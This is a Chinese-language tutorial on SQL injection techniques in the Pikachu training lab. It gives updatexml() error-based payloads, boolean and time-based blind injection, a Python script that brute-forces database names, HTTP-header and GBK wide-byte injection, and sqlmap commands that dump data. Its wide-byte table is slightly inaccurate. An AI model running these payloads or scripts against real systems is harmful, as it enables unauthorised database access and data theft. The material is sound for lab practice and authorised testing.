突破Union限制:Pikachu靶场中的高阶SQL注入实战解析
当你在渗透测试或CTF比赛中遇到无法直接回显数据的场景时,传统的Union查询往往显得力不从心。本文将带你深入Pikachu靶场,探索报错注入与盲注的自动化利用技巧,让你在实战中游刃有余。
1. 报错注入的核心原理与实战应用
报错注入的本质是利用数据库函数执行时的错误信息泄露机制。与Union查询不同,它不需要依赖回显位置,而是通过精心构造的Payload触发数据库报错,从而获取敏感信息。
1.1 updatexml()函数的妙用
updatexml()是MySQL中用于修改XML文档的函数,其报错特性使其成为注入利器。当XPath表达式格式错误时,MySQL会返回完整的错误信息:
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '这个Payload的工作原理:
concat(0x7e,...)将波浪符(~)与查询结果拼接- 错误的XPath表达式触发报错
- 数据库将拼接后的字符串作为错误信息返回
提示:0x7e(~)作为分隔符可提高结果可读性,避免与其他错误信息混淆
1.2 突破长度限制的技巧
updatexml()返回结果有长度限制(约32字符),可通过子串函数分段获取:
' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,30),0x7e),1) and '通过调整substr的第二个参数,可获取完整数据:
| 参数组合 | 获取内容范围 |
|---|---|
| substr(...,1,30) | 第1-30字符 |
| substr(...,31,30) | 第31-60字符 |
| substr(...,61,30) | 第61-90字符 |
2. 盲注的自动化攻击策略
当应用完全不显示数据库错误时,盲注成为唯一选择。Pikachu靶场提供了完美的盲注实验环境。
2.1 Boolean盲注的高效判断
Boolean盲注依赖逻辑判断返回差异。例如判断数据库名首字母:
admin' and left(database(),1)='p'--+为提高效率,可使用二分法快速定位字符:
- 判断字符ASCII码是否大于109
- 根据结果调整范围
- 通常5-7次请求即可确定单个字符
2.2 时间盲注与自动化脚本
当Boolean差异也不存在时,时间盲注是最后手段。结合if()和sleep():
import requests import time url = "http://target.com/login" chars = "abcdefghijklmnopqrstuvwxyz" found = "" for i in range(1,20): for c in chars: payload = f"admin' and if(substr(database(),{i},1)='{c}',sleep(3),0)--" start = time.time() requests.post(url, data={"username":payload}) if time.time() - start > 3: found += c print(f"Found: {found}") break3. 不同场景下的注入变体
3.1 HTTP头部注入实战
Cookie、User-Agent等头部也可能存在注入点。以Cookie注入为例:
Cookie: username=admin' or updatexml(1,concat(0x7e,database()),0) or '常见可注入的HTTP头部:
X-Forwarded-ForRefererUser-Agent- 自定义头部字段
3.2 宽字节注入的编码技巧
当应用使用GBK编码且过滤单引号时,可通过添加%df绕过:
name=1%df' union select 1,2#原理是%df与转义符\组合成中文字符,使单引号逃逸:
| 输入 | 数据库接收 | 最终解析 |
|---|---|---|
| %df' | %df' | 運' |
4. 从手动到自动化:sqlmap高级用法
掌握原理后,可利用工具提升效率。sqlmap针对不同注入类型有专门参数:
4.1 报错注入自动化
sqlmap -u "http://target.com/vul.php?id=1" --technique=E --dbms=mysql --batch关键参数:
--technique=E:指定报错注入--dbms=mysql:指定数据库类型--batch:自动选择默认选项
4.2 盲注场景优化
对于时间盲注,调整延迟阈值提高准确性:
sqlmap -u "http://target.com/login" --data="username=admin" --technique=T --time-sec=5 --level=5参数说明:
--technique=T:时间盲注--time-sec=5:设置延迟秒数--level=5:提高测试强度
4.3 结果导出与报告生成
将结果导出为HTML报告:
sqlmap -u "http://target.com/vul.php?id=1" --output-dir=./report --dump生成报告包含:
- 漏洞类型确认
- 数据库结构
- 提取的数据内容
- 使用的Payload列表
在最近一次内部渗透测试中,通过组合使用updatexml报错注入和sqlmap的--search参数,我们仅用15分钟就发现了客户CMS系统中被忽视的二次注入点,这比传统Union查询效率提升了近3倍
)